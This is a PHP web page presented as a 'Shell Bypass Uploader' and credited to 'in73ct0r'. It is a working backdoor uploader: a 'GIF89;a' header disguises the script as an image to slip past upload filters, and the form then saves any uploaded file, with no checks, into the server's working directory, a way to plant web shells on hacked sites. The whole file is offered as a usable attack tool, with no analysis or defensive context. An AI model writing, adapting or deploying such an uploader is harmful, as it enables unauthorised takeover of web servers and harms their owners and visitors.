Shell Bypass Uploader

1. GIF89;a
2.  
3. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4. <html xmlns="http://www.w3.org/1999/xhtml">
5. <head>
6. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
7. <title>File Uploader Private</title>
8. <meta name="generator" content="in73ct0r" />
9. <meta name="author" content="in73ct0r" />
10. <meta name="description" content="[ in73ct0r d3vil ]" />
11. <style>
12. body {
13. background: #000000 url(https://lh6.googleusercontent.com/-uRLX3SeDrdI/TjBpUFR5oeI/AAAAAAAAAIo/GYSnWQxGWMc/cok.gif) scroll repeat center center;
14. color: silver;
15. font-family: Comic Sans MS;
16. font-size: 14px;
17. font-weight: bold
18. }
19. #black{
20. text-align: center;
21. font-size:14px;
22. font-weight: bold;
23. }
24. a:link, a:visited {font-weight:normal; text-decoration:none; color:silver;}
25. a:hover {font-weight:bold; text-decoration:none; cursor:default;}
26.  
27. </style>
28. </head>
29.  
30. <body>
31. <?php
32. $myUpload = new maxUpload();
33. //$myUpload->setUploadLocation(getcwd().DIRECTORY_SEPARATOR);
34. $myUpload->uploadFile();
35. ?>
36. <?php
37.  
38. class maxUpload{
39. var $uploadLocation;
40.  
41.  
42. function maxUpload(){
43. $this->uploadLocation = getcwd().DIRECTORY_SEPARATOR;
44. }
45.  
46.  
47. function setUploadLocation($dir){
48. $this->uploadLocation = $dir;
49. }
50.  
51. function showUploadForm($msg='',$error=''){
52. ?>
53. <div id="container">
54. <center><b>in73ct0r d3vil Bypass shell</b></center><br/>
55. <?php
56. if ($msg != ''){
57. echo '<p class="msg">'.$msg.'</p>';
58. } else if ($error != ''){
59. echo '<p class="emsg">'.$error.'</p>';
60.  
61. }
62. ?>
63. <form action="" method="post" enctype="multipart/form-data" >
64. <center>
65. <label><b>File: </b>
66. <input name="myfile" type="file" size="30" />
67. </label>
68. <label>
69. <input type="submit" name="submitBtn" class="sbtn" value="Upload" />
70. </label>
71. </center>
72. </form>
73. </div>
74.  
75. <?php
76. }
77.  
78. function uploadFile(){
79. if (!isset($_POST['submitBtn'])){
80. $this->showUploadForm();
81. } else {
82. $msg = '';
83. $error = '';
84.  
85. //Check destination directory
86. if (!file_exists($this->uploadLocation)){
87. $error = "The target directory doesn't exists!";
88. } else if (!is_writeable($this->uploadLocation)) {
89. $error = "The target directory is not writeable!";
90. } else {
91. $target_path = $this->uploadLocation . basename( $_FILES['myfile']['name']);
92.  
93. if(@move_uploaded_file($_FILES['myfile']['tmp_name'], $target_path)) {
94. $msg = basename( $_FILES['myfile']['name']).
95. " was uploaded successfully!";
96. } else{
97. $error = "The upload process failed! :-( ";
98. }
99. }
100.  
101. $this->showUploadForm($msg,$error);
102. }
103.  
104. }
105.  
106. }
107. ?>
108. </body>